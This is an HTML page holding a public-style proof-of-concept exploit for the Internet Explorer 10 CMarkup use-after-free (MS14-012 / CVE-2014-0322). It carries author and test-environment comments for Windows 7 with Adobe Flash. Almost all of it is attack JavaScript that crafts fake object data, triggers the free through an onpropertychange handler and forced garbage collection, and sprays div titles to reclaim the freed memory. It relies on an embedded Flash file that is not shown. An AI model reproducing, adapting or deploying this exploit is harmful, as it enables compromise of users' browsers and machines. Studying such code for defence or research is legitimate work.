<!-- MS14-012 Internet Explorer CMarkup Use-After-Free Vendor Homepage: http://www.microsoft.com Version: IE 10 Date: 2014-03-31 Exploit Author: Jean-Jamil Khalife Tested on: Windows 7 SP1 x64 (fr, en) Flash versions tested: Adobe Flash Player (12.0.0.70, 12.0.0.77) Home: http://www.hdwsec.fr Blog : http://www.hdwsec.fr/blog/ MS14-012 / CVE-2014-0322 --> <html> <head> </head> <body> <script> var g_arr = []; var arrLen = 0x250; function dword2data(dword) { var d = Number(dword).toString(16); while (d.length < 8) d = '0' + d; return unescape('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4)); } function eXpl() { var a=0; for (a=0; a < arrLen; a++) { g_arr[a] = document.createElement('div'); } // Build a new object var b = dword2data(0x19fffff3); while (b.length < 0x360) { // mov eax,dword ptr [esi+98h] // ... // mov eax,dword ptr [eax+8] // and dword ptr [eax+2F0h],0FFFFFFBFh if (b.length == (0x98 / 2)) { b += dword2data(0x1a000010); } // mov ecx,dword ptr [edx+94h] // mov eax,dword ptr [ecx+0Ch] else if (b.length == (0x94 / 2)) { b += dword2data(0x1a111111); } // mov eax,dword ptr [edx+15Ch] // mov ecx,dword ptr [eax+edx*8] else if (b.length == (0x15c / 2)) { b += dword2data(0x42424242); } else { b += dword2data(0x19fffff3); } } var d = b.substring(0, ( 0x340 - 2 )/2); // trigger try{ this.outerHTML=this.outerHTML } catch(e){ } CollectGarbage(); // Replace freed object for (a=0; a < arrLen; a++) { g_arr[a].title = d.substring(0, d.length); } } // Trigger the vulnerability function trigger() { var a = document.getElementsByTagName("script"); var b = a[0]; b.onpropertychange = eXpl; var c = document.createElement('SELECT'); c = b.appendChild(c); } </script> <embed src=AsXploit.swf width="10" height="10"></embed> </body> </html>